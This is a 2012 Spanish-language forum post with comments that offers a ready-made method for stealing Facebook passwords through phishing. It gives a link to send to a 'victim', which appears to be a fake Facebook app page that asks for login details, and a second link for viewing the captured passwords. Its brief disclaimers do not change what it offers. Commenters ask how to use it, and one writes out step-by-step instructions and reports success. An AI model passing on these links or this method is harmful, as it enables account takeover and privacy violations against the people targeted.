Robar contraseñas de facebook!!! 2012 , sin descargas!!!

Robar contraseñas de facebook!!! 2012 , sin descargas!!!
Cómo robar una contraseña de Facebook es uno de los temas más demandados e investigados por los internautas. Todo ello provocado por el éxito que tiene Facebook en estos últimos años. El interés por aprovechar todos sus servicios y por tanto, el de saber todos sus secretos, también incluye métodos no autorizados e incluso ilegales, como es el de sustraer información a otros usuarios. El proceso de robar contraseñas, se conoce con el nombre de phishing, que es como en informática se denomina al delito de intentar adquirir información privada de un usuario de internet mediante una forma fraudulenta. Igual... les cuento xD

Si quereis robar una contraseña de Facebook y buscaiss en internet encontramos una gran variedad de foros y páginas web, que explican multitud de métodos para realizar estas prácticas, desde crear cuentas falsas hasta usar aplicaciones especiales (las cuales no aconsejamos utilizar, porque en muchos casos son perjudiciales para nuestros equipos informáticos). Pero el método más nombrado y comentado por gran parte de los cibernautas, es el basado en lanzadores o xploit, es decir, programas que se encargan de envíos falsos de correo.

Consiste en mandar un correo falso a la víctima, en su contenido anima a pulsar sobre un enlace. Al abrirse el link, ya estará dentro del sistema, que será una web idéntica a Facebook y pedirá que ingrese su contraseña. Una vez que la introduzcamos, el programa comprueba si es verdadera, y si es correcto, se almacenará en la base de datos, para poder realizar un uso malintencionado de ello posteriormente. Por supuesto, nosotros no consideramos este uso como legal y en consecuencia no lo apoyamos.

La idea de robar la contraseña siempre ha sido un tema que crea gran interés en la sociedad, pero en mi opinión, hay que respetar la privacidad de cada persona.

Aca los links:

Link a enviar a la victima:

http://www.facebook.com/pages/face-book-20/220343264679471?sk=app_19793677355...

Link Para Ver La Contraseña De La Victima:

http://vaash.com/contras

y si te vas sin comentar y sin poner puntos....
contraseña

17 comentarios - Robar contraseñas de facebook!!! 2012 , sin descargas!!!

adrian_gg_90
Y cómo es que funciona?
O sea, yo envío ese mail... y la otra persona tiene que poner "me gusta" o qué otra cosa tiene que hacer? Gracias!
adrian_gg_90 +1
Me expresé mal... yo envío ese enlace por mail a la víctima. La víctima una vez que entra al enlace... tiene que poner "me gusta"?? o qué es lo que tiene que hacer? Gracias!
Bebebcita
no entiendo x favor ayudenme
PsyJosue
WOOOOOW me funciono asilo hice:

abri el LINK
Le di me GUsta a la pagina face-book 2.0
Despues hay una opcion alado de "fotos" que dice instalar y le das clic en instalar
despues te pide el correo y contraseña.... te aparace verificando
te sale un cuadro de dialogo "Nos comunicaremos contigo"

Ahora vas a esta pagina http://vaash.com/contras ..... para comprobar si se almaceno, INGRESAS EL CORREO DE LA VICTIMA Y la contraseña JUNTO CON LA FECHA DE INGRESO TE APARECE y listo en cuestion de segundos ya esta ¡!¡!¡


TE DEJO 10 ¡!¡!
THEMASTERPIECE64
MIRA A MI NOME ABRE LA PAGINA DE VER LAS CONTRASEÑAS PUES
THEMASTERPIECE64
bueno ahora si si me funciono jajajajjajja grasias men ia lo necesitava
hafidd13
Pero la gente no querrá instalarlo...